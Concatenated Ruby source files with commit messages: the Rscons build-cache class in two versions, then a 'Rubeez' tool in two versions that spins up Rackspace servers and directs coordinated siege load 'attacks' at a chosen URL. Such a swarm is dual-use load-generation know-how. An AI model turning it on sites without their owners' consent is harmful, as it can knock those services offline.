unless @cache["targets"][cache_key]["command"] == Digest::MD5.hexdigest(command.inspect)
if options[:debug]
puts "Target #{target} needs rebuilding because the command used to build it has changed"
end
return false
end
cached_deps = @cache["targets"][cache_key]["deps"] || []
cached_deps_fnames = cached_deps.map { |dc| dc["fname"] }
if options[:strict_deps]
# depedencies passed in must exactly equal those in the cache
unless deps == cached_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the :strict_deps option is given and the set of dependencies does not match the previous set of dependencies"
end
return false
end
else
# all dependencies passed in must exist in cache (but cache may have more)
unless (Set.new(deps) - Set.new(cached_deps_fnames)).empty?
if options[:debug]
puts "Target #{target} needs rebuilding because there are new dependencies"
end
return false
end
end
# set of user dependencies must match
user_deps = env.get_user_deps(target) || []
cached_user_deps = @cache["targets"][cache_key]["user_deps"] || []
cached_user_deps_fnames = cached_user_deps.map { |dc| dc["fname"] }
unless user_deps == cached_user_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the set of user-specified dependency files has changed"
end
return false
end
# all cached dependencies must have their checksums match
(cached_deps + cached_user_deps).each do |dep_cache|
unless dep_cache["checksum"] == lookup_checksum(dep_cache["fname"])
if options[:debug]
puts "Target #{target} needs rebuilding because dependency file #{dep_cache["fname"]} has changed"
end
return false
end
end
end
true
end
# Store cache information about target(s) built by a builder.
#
# @param targets [Symbol, String, Array<String>]
# The name of the target(s) built.
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of dependencies for the target.
# @param env [Environment] The {Rscons::Environment}.
#
# @return [void]
def register_build(targets, command, deps, env)
Array(targets).each do |target|
target_checksum = Rscons.phony_target?(target) ? "" : calculate_checksum(target)
@cache["targets"][get_cache_key(target)] = {
"command" => Digest::MD5.hexdigest(command.inspect),
"checksum" => target_checksum,
"deps" => deps.map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
"user_deps" => (env.get_user_deps(target) || []).map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
}
@dirty = true
end
end
# Return a list of targets that have been built.
#
# @return [Array<String>] List of targets that have been built.
def targets
@cache["targets"].keys
end
# Make any needed directories and record the ones that are created for
# removal upon a "clean" operation.
#
# @param path [String] Directory to create.
#
# @return [void]
def mkdir_p(path)
parts = path.split(/[\\\/]/)
parts.each_index do |i|
next if parts[i] == ""
subpath = File.join(*parts[0, i + 1])
unless File.exists?(subpath)
FileUtils.mkdir(subpath)
@cache["directories"][subpath] = true
@dirty = true
end
end
end
# Return a list of directories which were created as a part of the build.
#
# @return [Array<String>]
# List of directories which were created as a part of the build.
def directories
@cache["directories"].keys
end
private
# Return a String key based on the target name to use in the on-disk cache.
#
# @param target_name [Symbol, String]
# Target name.
#
# @return [String]
# Key name.
def get_cache_key(target_name)
if Rscons.phony_target?(target_name)
PHONY_PREFIX + target_name.to_s
else
target_name
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize!
@cache = JSON.load(File.read(CACHE_FILE)) rescue {}
unless @cache.is_a?(Hash)
$stderr.puts "Warning: #{CACHE_FILE} was corrupt. Contents:\n#{@cache.inspect}"
@cache = {}
end
@cache["targets"] ||= {}
@cache["directories"] ||= {}
@cache["default_environment_vars"] ||= {}
@cache["configuration_data"] ||= {}
@lookup_checksums = {}
@dirty = false
end
# Return a file's checksum, or the previously calculated checksum for
# the same file.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
def lookup_checksum(file)
@lookup_checksums[file] || calculate_checksum(file)
end
# Calculate and return a file's checksum.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
def calculate_checksum(file)
@lookup_checksums[file] = Digest::MD5.hexdigest(File.read(file, mode: "rb")) rescue ""
end
# Validate that an object is one of a known set of values that can be
# serialized properly with JSON.
#
# @param o [Object]
# Object to validate.
def validate_json_object(o)
if o.is_a?(Array)
o.each {|v| validate_json_object(v)}
elsif o.is_a?(Hash)
o.each {|*kv| validate_json_object(kv)}
elsif [NilClass, TrueClass, FalseClass, String].none? {|c| o.is_a?(c)}
raise "Unexpected cache value for serialization: #{o.inspect}"
end
end
end
end
cache: remove obsolete "default_environment_vars" entry
require "digest/md5"
require "fileutils"
require "json"
require "set"
require "rscons/version"
module Rscons
# The Cache class keeps track of file checksums, build target commands and
# dependencies in a JSON file which persists from one invocation to the next.
# Example cache:
# {
# "version" => "1.2.3",
# "targets" => {
# "program" => {
# "checksum" => "A1B2C3D4",
# "command" => "13543518FE",
# "deps" => [
# {
# "fname" => "program.o",
# "checksum" => "87654321",
# },
# ],
# "user_deps" => [
# {
# "fname" => "lscript.ld",
# "checksum" => "77551133",
# },
# ],
# },
# "program.o" => {
# "checksum" => "87654321",
# "command" => "98765ABCD",
# "deps" => [
# {
# "fname" => "program.c",
# "checksum" => "456789ABC",
# },
# {
# "fname" => "program.h",
# "checksum" => "7979764643",
# },
# ],
# "user_deps" => [],
# }
# },
# "directories" => {
# "build" => true,
# "build/one" => true,
# "build/two" => true,
# },
# }
class Cache
# Name of the file to store cache information in
CACHE_FILE = ".rsconscache"
# Prefix for phony cache entries.
PHONY_PREFIX = ":PHONY:"
class << self
# Access the singleton instance.
def instance
@instance ||= Cache.new
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize
initialize!
end
# Remove the cache file.
#
# @return [void]
def clear
FileUtils.rm_f(CACHE_FILE)
initialize!
end
# Clear the cached file checksums.
#
# @return [void]
def clear_checksum_cache!
@lookup_checksums = {}
end
# Return whether the project has been configured.
#
# @return [Boolean]
# Whether the project has been configured.
def configured?
@cache["configured"]
end
# Set whether the project has been configured.
#
# @param configured [Boolean]
# Whether the project has been configured.
#
# @return [void]
def set_configured(configured)
@cache["configured"] = configured
@dirty = true
end
# Access configuration data.
def configuration_data
@cache["configuration_data"]
end
# Set configuration data.
#
# @param value [Hash]
# Configuration data.
def configuration_data=(value)
@cache["configuration_data"] = value
@dirty = true
end
# Write the cache to disk if it is dirty.
#
# @return [void]
def write
if @dirty || (@cache["version"] != VERSION)
@cache["version"] = VERSION
validate_json_object(@cache)
File.open(CACHE_FILE, "w") do |fh|
fh.puts(JSON.dump(@cache))
end
end
@dirty = false
end
# Force a write of the cache to disk.
#
# @return [void]
def write!
@dirty = true
write
end
# Check if target(s) are up to date.
#
# @param targets [Symbol, String, Array<String>]
# The name(s) of the target file(s).
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of the target's dependency files.
# @param env [Environment] The Rscons::Environment.
# @param options [Hash] Optional options.
# @option options [Boolean] :debug
# If turned on, this causes the Cache to print messages explaining why
# a build target is out of date. This could aid a builder author in
# debugging the operation of their builder.
# @option options [Boolean] :strict_deps
# Only consider a target up to date if its list of dependencies is
# exactly equal (including order) to the cached list of dependencies
#
# @return [Boolean]
# True value if the targets are all up to date, meaning that,
# for each target:
# - the target exists on disk
# - the cache has information for the target
# - the target's checksum matches its checksum when it was last built
# - the command used to build the target is the same as last time
# - all dependencies listed are also listed in the cache, or, if
# :strict_deps was given in options, the list of dependencies is
# exactly equal to those cached
# - each cached dependency file's current checksum matches the checksum
# stored in the cache file
def up_to_date?(targets, command, deps, env, options = {})
Array(targets).each do |target|
cache_key = get_cache_key(target)
unless Rscons.phony_target?(target)
# target file must exist on disk
unless File.exists?(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it does not exist on disk"
end
return false
end
end
# target must be registered in the cache
unless @cache["targets"].has_key?(cache_key)
if options[:debug]
puts "Target #{target} needs rebuilding because there is no cached build information for it"
end
return false
end
unless Rscons.phony_target?(target)
# target must have the same checksum as when it was built last
unless @cache["targets"][cache_key]["checksum"] == lookup_checksum(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it has been changed on disk since being built last"
end
return false
end
end
# command used to build target must be identical
unless @cache["targets"][cache_key]["command"] == Digest::MD5.hexdigest(command.inspect)
if options[:debug]
puts "Target #{target} needs rebuilding because the command used to build it has changed"
end
return false
end
cached_deps = @cache["targets"][cache_key]["deps"] || []
cached_deps_fnames = cached_deps.map { |dc| dc["fname"] }
if options[:strict_deps]
# depedencies passed in must exactly equal those in the cache
unless deps == cached_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the :strict_deps option is given and the set of dependencies does not match the previous set of dependencies"
end
return false
end
else
# all dependencies passed in must exist in cache (but cache may have more)
unless (Set.new(deps) - Set.new(cached_deps_fnames)).empty?
if options[:debug]
puts "Target #{target} needs rebuilding because there are new dependencies"
end
return false
end
end
# set of user dependencies must match
user_deps = env.get_user_deps(target) || []
cached_user_deps = @cache["targets"][cache_key]["user_deps"] || []
cached_user_deps_fnames = cached_user_deps.map { |dc| dc["fname"] }
unless user_deps == cached_user_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the set of user-specified dependency files has changed"
end
return false
end
# all cached dependencies must have their checksums match
(cached_deps + cached_user_deps).each do |dep_cache|
unless dep_cache["checksum"] == lookup_checksum(dep_cache["fname"])
if options[:debug]
puts "Target #{target} needs rebuilding because dependency file #{dep_cache["fname"]} has changed"
end
return false
end
end
end
true
end
# Store cache information about target(s) built by a builder.
#
# @param targets [Symbol, String, Array<String>]
# The name of the target(s) built.
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of dependencies for the target.
# @param env [Environment] The {Rscons::Environment}.
#
# @return [void]
def register_build(targets, command, deps, env)
Array(targets).each do |target|
target_checksum = Rscons.phony_target?(target) ? "" : calculate_checksum(target)
@cache["targets"][get_cache_key(target)] = {
"command" => Digest::MD5.hexdigest(command.inspect),
"checksum" => target_checksum,
"deps" => deps.map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
"user_deps" => (env.get_user_deps(target) || []).map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
}
@dirty = true
end
end
# Return a list of targets that have been built.
#
# @return [Array<String>] List of targets that have been built.
def targets
@cache["targets"].keys
end
# Make any needed directories and record the ones that are created for
# removal upon a "clean" operation.
#
# @param path [String] Directory to create.
#
# @return [void]
def mkdir_p(path)
parts = path.split(/[\\\/]/)
parts.each_index do |i|
next if parts[i] == ""
subpath = File.join(*parts[0, i + 1])
unless File.exists?(subpath)
FileUtils.mkdir(subpath)
@cache["directories"][subpath] = true
@dirty = true
end
end
end
# Return a list of directories which were created as a part of the build.
#
# @return [Array<String>]
# List of directories which were created as a part of the build.
def directories
@cache["directories"].keys
end
private
# Return a String key based on the target name to use in the on-disk cache.
#
# @param target_name [Symbol, String]
# Target name.
#
# @return [String]
# Key name.
def get_cache_key(target_name)
if Rscons.phony_target?(target_name)
PHONY_PREFIX + target_name.to_s
else
target_name
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize!
@cache = JSON.load(File.read(CACHE_FILE)) rescue {}
unless @cache.is_a?(Hash)
$stderr.puts "Warning: #{CACHE_FILE} was corrupt. Contents:\n#{@cache.inspect}"
@cache = {}
end
@cache["targets"] ||= {}
@cache["directories"] ||= {}
@cache["configuration_data"] ||= {}
@lookup_checksums = {}
@dirty = false
end
# Return a file's checksum, or the previously calculated checksum for
# the same file.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
def lookup_checksum(file)
@lookup_checksums[file] || calculate_checksum(file)
end
# Calculate and return a file's checksum.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
def calculate_checksum(file)
@lookup_checksums[file] = Digest::MD5.hexdigest(File.read(file, mode: "rb")) rescue ""
end
# Validate that an object is one of a known set of values that can be
# serialized properly with JSON.
#
# @param o [Object]
# Object to validate.
def validate_json_object(o)
if o.is_a?(Array)
o.each {|v| validate_json_object(v)}
elsif o.is_a?(Hash)
o.each {|*kv| validate_json_object(kv)}
elsif [NilClass, TrueClass, FalseClass, String].none? {|c| o.is_a?(c)}
raise "Unexpected cache value for serialization: #{o.inspect}"
end
end
end
end
|
# The MIT License
# Copyright (c) 2013 Ryan Walker
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require 'rubeez'
require 'rubeez/application'
require 'rubeez/log'
require 'net/ssh'
require 'ruport'
require 'csv'
require 'fog'
require 'nokogiri'
require 'open-uri'
module Rubeez
class Swarm
def initialize
super
end
def attack
threads = Array.new
check_swarm_exists?
check_url
load_keys
cmd = attack_command
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
beez.count.times do |i|
threads[i] = Thread.new do
server = connection.servers.get(beez[i])
output = server.ssh(['chmod +x /tmp/rubeez_prepare.sh && bash /tmp/rubeez_prepare.sh', cmd],
:key_data => Rubeez::Config[:private_key_data].to_s)
Rubeez::Log.info("#{server.name}: Completed Attack")
end
end
threads.each do |t|
t.join
end
results = gather_reports
Rubeez::Log.info("Results averaged across the entire swarm:")
print_results(results)
clean_up
end
def attack_command
check_url
get_headers
urls = generate_content_urls
cmd = "echo -e \"#{generate_content_urls}\" >> /tmp/urls.txt;"
#cmd << "ab -e /tmp/rubeez.out -r -n #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} -C 'sessionid=SomeSessionID' #{Rubeez::Config[:header_string]} '#{Rubeez::Config[:url]}'"
cmd << "siege -r #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} -f /tmp/urls.txt -l /tmp/rubeez.out"
Rubeez::Log.info("Attacking #{Rubeez::Config[:url]} with the following command:")
Rubeez::Log.info("#{cmd}")
Rubeez::Log.info("If this is your first attack with this swarm, it may take a few minutes before starting")
return cmd
end
def check_swarm_exists?
if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
return true
else
swarm_no_exist
end
end
def check_url
uri = URI(Rubeez::Config[:url])
if not uri.scheme
uri = URI("http://" + Rubeez::Config[:url])
end
uri.path = "/" if uri.path.empty?
Rubeez::Config[:url] = uri.to_s
end
def clean_up
beez = read_file(Rubeez::Config[:rubeez_file])
files = beez.map {|x| "/tmp/#{x}.out"}
Rubeez::Log.debug("Removing local results files")
files.each do |file|
File.delete(file)
Rubeez::Log.debug("Deleted #{file}")
end
end
def clear_file(file)
File.open(file, 'w') {}
end
def create_connection
connection = Fog::Compute.new({
:provider => 'Rackspace',
:rackspace_username => Rubeez::Config[:username],
:rackspace_api_key => Rubeez::Config[:apikey],
# :rackspace_region => Rubeez::Config[:region],
:version => :v2
})
return connection
end
def create_keys
unless File.exists?(File.expand_path(Rubeez::Config[:private_key])) and File.exists?(File.expand_path(Rubeez::Config[:public_key]))
key = OpenSSL::PKey::RSA.new 2048
type = key.ssh_type
data = [ key.to_blob ].pack('m0')
File.open(File.expand_path('~/.ssh/fog_rsa'), 'w') do |f|
f.puts "#{key}"
end
File.open(File.expand_path('~/.ssh/fog_rsa.pub'), 'w') do |f|
f.puts "#{type} #{data}"
end
end
end
def create_bee(connection, name)
load_keys
bee = connection.servers.create(
:name => name,
:flavor_id => connection.flavors.first.id,
:image_id => connection.images.find {|img| img.name =~ /Ubuntu 12.04/}.id,
:personality => [{
:path => '/root/.ssh/authorized_keys',
:contents => Base64.encode64(Rubeez::Config[:public_key_data].to_s)
},
{
:path => '/tmp/rubeez_prepare.sh',
:contents => Base64.encode64("#! /bin/bash\nif [ ! -f /tmp/rubeez_ready ]; then\napt-get update\napt-get install -y apache2-utils\napt-get install -y siege\ntouch /tmp/rubeez_ready\nfi")
},
]
)
Rubeez::Log.info("Adding #{bee.name} to the swarm.")
write_file(Rubeez::Config[:rubeez_file], bee.id)
return bee
end
def generate_content_urls
doc = Nokogiri::HTML(open("#{Rubeez::Config[:url]}"))
urls = ''
urls = "#{Rubeez::Config[:url]}\n"
doc.xpath("//img/@src").each do |script|
urls << script << "\n"
end
doc.xpath("//script/@src").each do |script|
urls << script << "\n"
end
return urls
end
def create_swarm
beez = []
threads = []
if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
Rubeez::Log.info("Swarm already exists. Run 'rubeez --kill' to delete servers and start new swarm.")
exit
end
connection = create_connection
create_keys
Rubeez::Log.info("Populating swarm - this may take some time")
Rubeez::Log.info("-----------------------------------------")
Rubeez::Config[:beez].to_i.times do |i|
Rubeez::Log.info("Creating bee ##{i}")
threads[i] = Thread.new do
bee = create_bee(connection, "rubeez-worker-n#{i}")
beez << bee
end
end
threads.each do |t|
t.join
end
Rubeez::Log.info("Swarm Created:")
beez.each {|bee| Rubeez::Log.info("#{bee.name}: #{bee.id}")}
Rubeez::Log.info("Use 'rubeez -s' to check status.")
end
def gather_reports
threads = Array.new
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
beez.count.times do |i|
threads[i] = Thread.new do
server = connection.servers.get(beez[i])
Fog::SCP.new(server.ipv4_address, 'root',
{:key_data => Rubeez::Config[:private_key_data].to_s}).download(
'/tmp/rubeez.out', "/tmp/#{beez[i]}.out", {})
end
end
threads.each do |t|
t.join
end
files = beez.map {|x| "/tmp/#{x}.out"}
data = Array.new
files.each do |file|
data << CSV.read(file)
end
average = data[0]
data[0].count.times do |j|
unless data[0][j][0].include?('Percentage')
c = Array.new
data.each do |file|
unless c[j].nil?
c[j] << file[j][1]
else
c[j] = *file[j][1]
end
end
average[j][1] = c[j]
end
end
average.count.times do |i|
unless average[i][0].include?('Percentage')
average[i][1].count.times do |j|
average[i][1][j] = average[i][1][j].to_f
end
average[i][1] = average[i][1].instance_eval { reduce(:+) / size.to_f }.round(4)
end
end
return average
end
def get_headers
Rubeez::Config[:header_string] = ''
if Rubeez::Config[:headers] != ''
Rubeez::Config[:header].split(';').each do |header|
Rubeez::Config[:header_string] += ' -H ' + header
end
end
end
def kill_swarm
threads = Array.new
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
Rubeez::Log.info("Killing swarm...")
beez.count.times do |i|
threads[i] = Thread.new do
connection.servers.destroy(beez[i])
Rubeez::Log.info("Killed bee #{beez[i]}")
end
end
threads.each do |t|
t.join
end
clear_file(Rubeez::Config[:rubeez_file])
Rubeez::Log.info("Swarm killed.")
end
def load_keys
Rubeez::Config[:private_key_data] = File.read File.expand_path(Rubeez::Config[:private_key])
Rubeez::Config[:public_key_data] = File.read File.expand_path(Rubeez::Config[:public_key])
end
def print_results(results)
table = Table(%w[percentage_served time_in_ms])
results.drop(1).each do |row|
table << { "percentage_served" => row[0], "time_in_ms" => row[1] }
end
Rubeez::Log.info("\n#{table.to_text}")
end
def read_file(file)
contents = Array.new
contents = IO.readlines file
contents.each do |line|
line.strip!
end
return contents
end
def status
status = Array.new
check_swarm_exists?
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
beez.each do |id|
bee = connection.servers.get(id)
status << bee.state
Rubeez::Log.info("#{bee.name}: #{bee.state} - #{bee.progress}")
end
unless status.include?("BUILD") or status.include?("ERROR")
Rubeez::Log.info("All beez ready! Swarm is complete. Run 'rubeez --attack --url [TARGET]'")
else
Rubeez::Log.info("Swarm still forming. #{status.count {|x| x == 'ACTIVE'}} out of #{status.count} complete.")
end
end
def swarm
create_swarm
end
def swarm_no_exist
Rubeez::Log.info("Swarm has not been populated yet. Run rubeez -u [USERNAME] -a [APIKEY] -b [NUM_OF_BEEZ] to create it.")
exit
end
def swarm_not_ready
Rubeez::Log.info("Swarm not fully populated. Run 'rubeez -s' for status.")
exit
end
def swarm_ready?
if check_swarm_exists?
state = Array.new
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
beez.each do |id|
bee = connection.servers.get(id)
if !bee.ready?
swarm_not_ready
end
end
else
swarm_no_exist
end
end
def write_file(file, data)
File.open(File.expand_path(file), 'a') {|f| f.write(data + "\n") }
end
end
end
Gathering stats from siege.
# The MIT License
# Copyright (c) 2013 Ryan Walker
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require 'rubeez'
require 'rubeez/application'
require 'rubeez/log'
require 'net/ssh'
require 'net/scp'
require 'ruport'
require 'csv'
require 'fog'
require 'nokogiri'
require 'open-uri'
module Rubeez
class Swarm
def initialize
super
end
def attack
threads = Array.new
check_swarm_exists?
check_url
load_keys
cmd = attack_command
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
beez.count.times do |i|
threads[i] = Thread.new do
server = connection.servers.get(beez[i])
output = server.ssh(['chmod +x /tmp/rubeez_prepare.sh && bash /tmp/rubeez_prepare.sh', cmd],
:key_data => Rubeez::Config[:private_key_data].to_s)
Rubeez::Log.info("#{server.name}: Completed Attack")
end
end
threads.each do |t|
t.join
end
results = gather_reports
Rubeez::Log.info("Results averaged across the entire swarm:")
print_results(results)
clean_up
end
def attack_command
check_url
get_headers
urls = generate_content_urls
cmd = "echo -e \"#{generate_content_urls}\" >> /tmp/urls.txt;"
cmd << "siege -r #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} --log=/tmp/rubeez.out -f /tmp/urls.txt"
Rubeez::Log.info("Attacking #{Rubeez::Config[:url]}...")
Rubeez::Log.info("If this is your first attack with this swarm, it may take a few minutes before starting")
return cmd
end
def check_swarm_exists?
if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
return true
else
swarm_no_exist
end
end
def check_url
uri = URI(Rubeez::Config[:url])
if not uri.scheme
uri = URI("http://" + Rubeez::Config[:url])
end
uri.path = "/" if uri.path.empty?
Rubeez::Config[:url] = uri.to_s
end
def clean_up
beez = read_file(Rubeez::Config[:rubeez_file])
files = beez.map {|x| "/tmp/#{x}.out"}
Rubeez::Log.debug("Removing local results files")
files.each do |file|
File.delete(file)
Rubeez::Log.debug("Deleted #{file}")
end
end
def clear_file(file)
File.open(file, 'w') {}
end
def create_connection
connection = Fog::Compute.new({
:provider => 'Rackspace',
:rackspace_username => Rubeez::Config[:username],
:rackspace_api_key => Rubeez::Config[:apikey],
# :rackspace_region => Rubeez::Config[:region],
:version => :v2
})
return connection
end
def create_keys
unless File.exists?(File.expand_path(Rubeez::Config[:private_key])) and File.exists?(File.expand_path(Rubeez::Config[:public_key]))
key = OpenSSL::PKey::RSA.new 2048
type = key.ssh_type
data = [ key.to_blob ].pack('m0')
File.open(File.expand_path('~/.ssh/fog_rsa'), 'w') do |f|
f.puts "#{key}"
end
File.open(File.expand_path('~/.ssh/fog_rsa.pub'), 'w') do |f|
f.puts "#{type} #{data}"
end
end
end
def create_bee(connection, name)
load_keys
bee = connection.servers.create(
:name => name,
:flavor_id => connection.flavors.first.id,
:image_id => connection.images.find {|img| img.name =~ /Ubuntu 12.04/}.id,
:personality => [{
:path => '/root/.ssh/authorized_keys',
:contents => Base64.encode64(Rubeez::Config[:public_key_data].to_s)
},
{
:path => '/tmp/rubeez_prepare.sh',
:contents => Base64.encode64("#! /bin/bash\nif [ ! -f /tmp/rubeez_ready ]; then\napt-get update\napt-get install -y apache2-utils\napt-get install -y siege\ntouch /tmp/rubeez_ready\nfi")
},
]
)
Rubeez::Log.info("Adding #{bee.name} to the swarm.")
write_file(Rubeez::Config[:rubeez_file], bee.id)
return bee
end
def generate_content_urls
doc = Nokogiri::HTML(open("#{Rubeez::Config[:url]}"))
urls = ''
urls = "#{Rubeez::Config[:url]}\n"
doc.xpath("//img/@src").each do |script|
urls << script << "\n"
end
doc.xpath("//script/@src").each do |script|
urls << script << "\n"
end
return urls
end
def create_swarm
beez = []
threads = []
if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
Rubeez::Log.info("Swarm already exists. Run 'rubeez --kill' to delete servers and start new swarm.")
exit
end
connection = create_connection
create_keys
Rubeez::Log.info("Populating swarm - this may take some time")
Rubeez::Log.info("-----------------------------------------")
Rubeez::Config[:beez].to_i.times do |i|
Rubeez::Log.info("Creating bee ##{i}")
threads[i] = Thread.new do
bee = create_bee(connection, "rubeez-worker-n#{i}")
beez << bee
end
end
threads.each do |t|
t.join
end
Rubeez::Log.info("Swarm Created:")
beez.each {|bee| Rubeez::Log.info("#{bee.name}: #{bee.id}")}
Rubeez::Log.info("Use 'rubeez -s' to check status.")
end
def gather_reports
threads = Array.new
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
beez.count.times do |i|
threads[i] = Thread.new do
server = connection.servers.get(beez[i])
Net::SCP.download!(server.ipv4_address, 'root',
'/tmp/rubeez.out', "/tmp/#{beez[i]}.out",
:ssh => {
:keys => File.expand_path(Rubeez::Config[:private_key])
})
end
end
threads.each do |t|
t.join
end
files = beez.map {|x| "/tmp/#{x}.out"}
data = Hash.new(0)
files.each do |file|
f = File.open(file).readlines
f.each do |readline|
if readline[f.last]
csv_data = CSV.parse(readline)
data["count"] += 1
data["elap_time"] += csv_data[0][2].to_f
data["resp_time"] += csv_data[0][4].to_f
data["trans_rate"] += csv_data[0][5].to_f
data["concurrent"] += csv_data[0][7].to_f
data["okay"] += csv_data[0][8].to_f
data["failed"] += csv_data[0][9].to_f
end
end
end
#average = data[0]
#data[0].count.times do |j|
# unless data[0][j][0].include?('Percentage')
# c = Array.new
# data.each do |file|
# unless c[j].nil?
# c[j] << file[j][1]
# else
# c[j] = *file[j][1]
# end
# end
# average[j][1] = c[j]
# end
#end
#average.count.times do |i|
# unless average[i][0].include?('Percentage')
# average[i][1].count.times do |j|
# average[i][1][j] = average[i][1][j].to_f
# end
# average[i][1] = average[i][1].instance_eval { reduce(:+) / size.to_f }.round(4)
# end
#end
return data
end
def get_headers
Rubeez::Config[:header_string] = ''
if Rubeez::Config[:headers] != ''
Rubeez::Config[:header].split(';').each do |header|
Rubeez::Config[:header_string] += ' -H ' + header
end
end
end
def kill_swarm
threads = Array.new
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
Rubeez::Log.info("Killing swarm...")
beez.count.times do |i|
threads[i] = Thread.new do
connection.servers.destroy(beez[i])
Rubeez::Log.info("Killed bee #{beez[i]}")
end
end
threads.each do |t|
t.join
end
clear_file(Rubeez::Config[:rubeez_file])
Rubeez::Log.info("Swarm killed.")
end
def load_keys
Rubeez::Config[:private_key_data] = File.read File.expand_path(Rubeez::Config[:private_key])
Rubeez::Config[:public_key_data] = File.read File.expand_path(Rubeez::Config[:public_key])
end
def print_results(results)
table = Table(%w[stats average])
Rubeez::Log.info(results['count'])
results.drop(1).each do |row|
table << [ row[0], (row[1].to_f / results['count'].to_f).to_s[0..4]]
end
Rubeez::Log.info("\n#{table.to_text}")
end
def read_file(file)
contents = Array.new
contents = IO.readlines file
contents.each do |line|
line.strip!
end
return contents
end
def status
status = Array.new
check_swarm_exists?
beez = read_file(Rubeez::Config[:rubeez_file])
connection = create_connection
beez.each do |id|
bee = connection.servers.get(id)
status << bee.state
Rubeez::Log.info("#{bee.name}: #{bee.state} - #{bee.progress}")
end
unless status.include?("BUILD") or status.include?("ERROR")
Rubeez::Log.info("All beez ready! Swarm is complete. Run 'rubeez --attack --url [TARGET]'")
else
Rubeez::Log.info("Swarm still forming. #{status.count {|x| x == 'ACTIVE'}} out of #{status.count} complete.")
end
end
def swarm
create_swarm
end
def swarm_no_exist
Rubeez::Log.info("Swarm has not been populated yet. Run rubeez -u [USERNAME] -a [APIKEY] -b [NUM_OF_BEEZ] to create it.")
exit
end
def swarm_not_ready
Rubeez::Log.info("Swarm not fully populated. Run 'rubeez -s' for status.")
exit
end
def swarm_ready?
if check_swarm_exists?
state = Array.new
connection = create_connection
beez = read_file(Rubeez::Config[:rubeez_file])
beez.each do |id|
bee = connection.servers.get(id)
if !bee.ready?
swarm_not_ready
end
end
else
swarm_no_exist
end
end
def write_file(file, data)
File.open(File.expand_path(file), 'a') {|f| f.write(data + "\n") }
end
end
end
|
class BuildkiteAgent < Formula
